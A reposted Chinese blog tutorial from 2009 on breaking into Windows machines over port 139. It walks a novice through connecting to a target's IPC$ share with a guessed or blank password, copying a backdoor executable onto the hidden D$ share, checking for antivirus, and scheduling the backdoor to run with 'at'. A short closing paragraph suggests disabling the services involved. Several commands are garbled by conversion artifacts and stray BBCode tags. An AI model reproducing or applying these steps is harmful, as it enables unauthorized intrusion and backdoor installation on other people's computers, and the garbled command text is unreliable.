139端口入侵

来源:互联网 发布:格林职业生涯数据 编辑:程序博客网 时间:2024/04/27 18:53

 

简单的139端口入侵教程
2009-08-24 07:30

提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。
  首先,连接的命令是:
  net<空格>use<空格>//IP地址/ipc$Content$lt;空格>密码<空格>/user:用户名
  假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:
  net use [url=file:////192.168.1.11/ipc$Content$nbsp;123456]//192.168.1.11/ipc$Content$nbsp;123456[/url] /user:google 如果连接成功,那么系统会提示"命令成功完成"!
  空密码是这样的:
  如果密码是空的,那就在原先输入密码的地方以""代替。
  开始查看权限:
  查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的:
  copy<>文件绝对路径<>//IP地址/文件目标路径
  比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:
  copy c:/a.exe [url=file:////192.168.1.11/d$Content$nbsp]//192.168.1.11/d$Content$nbsp[/url];
  要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。如果命令执行成功,系统同样会提示"已复制 1 个文件"
  小技巧:
  再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!
  如果系统提示“改写 [url=file:////192.168.1.11/d$/a.exe]//192.168.1.11/d$/a.exe[/url] 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。如果没有提示,则说明安装了杀毒软件。
  查看目标系统时间,准备使用at任务计划运行程序。
  命令格式:
  net<空格>time<空格>//IP地址
  例子:
  net time [url=file:////192.168.1.11]//192.168.1.11[/url]
  系统会返回目标的当前时间,时间显示后,AT任务计划命令需要使用24小时制。比如系统显示“//192.168.1.11 的当前时间是 2009/5/10 下午 06:02”在使用到AT任务计划命令时,这个“下午06:02”就需要换算成“18:02”!
  使用AT命令为目标系统添加任务计划:
  格式:
  at<空格>//IP地址<空格>指定运行时间<空格>需要运行的文件路径名
  例子:
  at [url=file:////192.168.1.11]//192.168.1.11[/url] 18:20 d:/a.exe
  IPC通道入侵就目前来看已经是一个非常老的攻击手段了,现在针对IPC通道的防御手段也越来越多,越来越简单。但如果一个攻击者成功获得了IPC通道的一个System权限,那对于被攻击的系统来说无意是致命的。
  所以,建议用户将Server服务关闭,信使服务与Task Scheduler服务(计划任务)也都关闭,这样可以较全面的保护计算机在IPC通道方面的安全。